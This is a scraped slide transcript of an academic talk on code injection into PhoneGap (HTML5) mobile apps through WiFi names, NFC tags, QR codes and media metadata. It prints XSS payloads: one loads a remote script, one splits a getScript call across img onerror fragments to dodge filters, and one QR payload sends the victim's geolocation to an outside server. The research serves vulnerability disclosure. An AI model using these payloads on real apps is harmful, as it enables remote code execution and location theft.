Presentation is loading. Please wait.

Presentation is loading. Please wait.

Code Injection Attacks on HTML5-based Mobile Apps

Similar presentations


Presentation on theme: "Code Injection Attacks on HTML5-based Mobile Apps"— Presentation transcript:

1 Code Injection Attacks on HTML5-based Mobile Apps
Xing Jin, Tongbo Luo, Derek G. Tsui, Wenliang Du Department of Electrical Engineering & Computer Science Syracuse University

2 (a) (b) (c) (d) (e) (f) (g) (h)

3 Outline BackGround Code Injection Attacks on HTML5-based mobile apps
Overview of HTML5-based Mobile App Overview of PhoneGap Architecture Risks in JavaScript Code Injection Attacks on HTML5-based mobile apps Overview of the Attack Channels of the Attack Examples (WIFI, NFC, MP3) Length limitation Real Vulnerable Cases Future Work

4 Overview of HTML5-based Mobile App
PhoneGap WebView HTML CSS JavaScript addJavascriptInterface() Device Accelerometer Camera Compass Contacts File Geolocation Notification Advantage: Can be easily ported between different platforms X X

5 Overview of PhoneGap Architecture

6 Risks in JavaScript Data and code can be mixed together.
var text="Hello!<script>alert('hello')</script>"; document.write(text); Once it runs, the data will be displayed, and the JavaScript code will also be executed. ; document.write(text); Once it runs, the data will be displayed, and the JavaScript code will also be executed.", "width": "800" }

7 Overview of the Attack

8 Overview of the Attack 2 3 1

9 Channels of XDS Attack ID Channels (WiFi, Bluetooth)
Data Channels Unique to Mobile Devices (NFC, Barcode, SMS) Metadata Channels (MP3, MP4, Image) For the channels we have identified in this paper, we categorized them into three categories. The first one is the ID channels, we can embed code into some identities, e.g., the WiFi SSID, Bluetooth name. The second one is data channels unique to mobile devices, including NFC, Barcode and SMS. The third one is the metadata channels. Media data, e.g., MP3, MP4, Image, they use metadata to describe the detail information of the files, including artist, album, model. We can also successfully inject code into these metadata Fields. Next I will pick one example in each category to show how the attack works.

10 Example 1(WiFi) Non PhoneGap WiFi-Finder PhoneGap WiFi-Finder

11 Example 2(NFC) Non PhoneGap NFC App PhoneGap NFC App

12 Example 3(mp3) Non PhoneGap Mp3 App PhoneGap Mp3 App
Non PhoneGap Mp3 App PhoneGap Mp3 App

13 Length Limitation of Channels

14 Overcome the limitation
Use External JS files: <script src=//mu.gl></script> ( will be filter out by innerHTML) Split JS code into pieces: <img src onerror=$.getScript('http://mu.gl')> (need to use jQuery) 1 <img src onerror=a="$.getScr"> 2 <img src onerror=b="ipt('ht"> 3 <img src onerror=c="tp://mu."> 4 <img src onerror=d="gl')"> 5 <img src onerror=eval(a+b+c+d)> ( will be filter out by innerHTML) Split JS code into pieces: (need to use jQuery) 1 2 3 4 5 ", "width": "800" }

15 Real vulnerable cases Downloaded 764 PhoneGap apps from Google Play
Find several vulnerable apps satisfy two attack conditions: read external data from the channels that we have identified use vulnerable APIs or attributes to display information from the channels

16 Real Vulnerable Cases Information sent to Sever Non PhoneGap App

17 Real vulnerable Cases The code injected in the QR code <img src=x onerror= navigator.geolocation.watchPosition( function(loc){ m='Latitude:'+loc.coords.latitude+ '\n'+'Longitude:'+loc.coords.longitude; alert(m); b=document.createElement('img'); b.src='http:// :5556?c='+m })>

18 Future Work Large Scale analysis of HTML5-based mobile apps
Solution to address the attack

19 Thanks! Q & A


Download ppt "Code Injection Attacks on HTML5-based Mobile Apps"

Similar presentations


Ads by Google